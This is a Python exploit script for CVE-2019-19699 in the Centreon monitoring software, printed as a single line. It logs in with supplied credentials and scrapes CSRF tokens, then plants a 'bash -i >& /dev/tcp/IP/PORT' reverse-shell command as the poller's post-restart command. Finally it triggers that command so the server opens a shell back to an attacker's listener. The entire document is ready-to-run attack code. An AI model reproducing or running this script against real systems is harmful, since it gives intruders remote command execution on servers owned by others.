import requests import re import sys import urllib.parse import _thread if len(sys.argv) < 6: print("Script by TheCyberGeek") print("Discovered by SpengeSec & TheCyberGeek") print("Start Listener before starting this exploit!") print("") print("Usage:\tpython3 CVE-2019-19699.py URL USER PASS IP PORT") print("Ex:\tpython3 CVE-2019-19699.py http://10.0.0.2/centreon admin centreon 10.0.0.1 4444") sys.exit(0) else: base_path, username, password, ip, port = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5] print("Script by TheCyberGeek") print("Discovered by SpengeSec & TheCyberGeek") print("Start Listener before starting this exploit!") s = requests.Session() f = s.get(base_path + "/index.php") token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1) f = s.post(base_path + "/index.php", data={"useralias": username, "password": password, "centreon_token": token, "submitLogin": "Connect"}) if "You need to enable JavaScript to run this app" in f.text: print("Logged in!") f = s.get(base_path + "/main.get.php?p=60803&o=a&type=3") token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1) if token: f = s.post(base_path + "/main.get.php?p=60803&type=3", data={"command_name": "shell", "command_type[command_type]": "3", "command_line": "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1".format(ip,port), "resource": "$CENTREONPLUGINS$", "plugins": "/Centreon/SNMP", "macros": "$ADMINEMAIL$", "command_example": "", "listOfArg": "", "listOfMacros": "", "connectors": "", "graph_id": "", "command_activate[command_activate]": "1", "command_comment": "", "submitA": "Save", "command_id": "", "type": "3", "o": "a", "centreon_token": token}) if "shell" in f.text: print("Great. Post-restart command has been saved!") s.get(base_path + "/main.get.php?p=60901&o=c&server_id=1") token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1) if token: # You may need to change pollercmd[0] to your sessions ID. f = s.post(base_path + "/main.get.php?p=60901", data={"name": "Central", "ns_ip_address": "127.0.0.1", "localhost[localhost]": "1", "is_default[is_default]": "1", "ssh_port": "22", "engine_start_command": "service centengine start", "engine_stop_command": "service centengine stop","engine_restart_command": "service centengine restart", "engine_reload_command": "service centengine reload", "nagios_bin": "/usr/sbin/centengine","nagiostats_bin": "/usr/sbin/centenginestats","nagios_perfdata": "/var/log/centreon-engine/service-perfdata", "broker_reload_command": "service cbd reload", "centreonbroker_cfg_path": "/etc/centreon-broker", "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker", "centreonbroker_logs_path": "", "centreonconnector_path": "/usr/lib64/centreon-connector", "init_script_centreontrapd": "centreontrapd", "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/", "pollercmd[0]":"188", "clone_order_pollercmd_0": "","ns_activate[ns_activate]": "1", "submitC": "Save", "id": "1", "o": "c", "centreon_token": token}) print("Saved the post-restart command in poller configuration!") s.get(base_path + "/main.php?p=60902&poller=1") token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1) if token: try: print("[ + ] Shell received. Check your listener!") f = s.post(base_path + """/include/configuration/configGenerate/xml/postcommand.php""", data={"poller": "1"}, timeout=0.0000000001) except requests.exceptions.ReadTimeout: pass else: print("Couldn't get token for poller export page...") else: print("Could not find token for poller configuration page...") else: print("Failed to upload command...") else: print("Failed to grab token for command execution page...") else: print("Cannot login to Centreon...")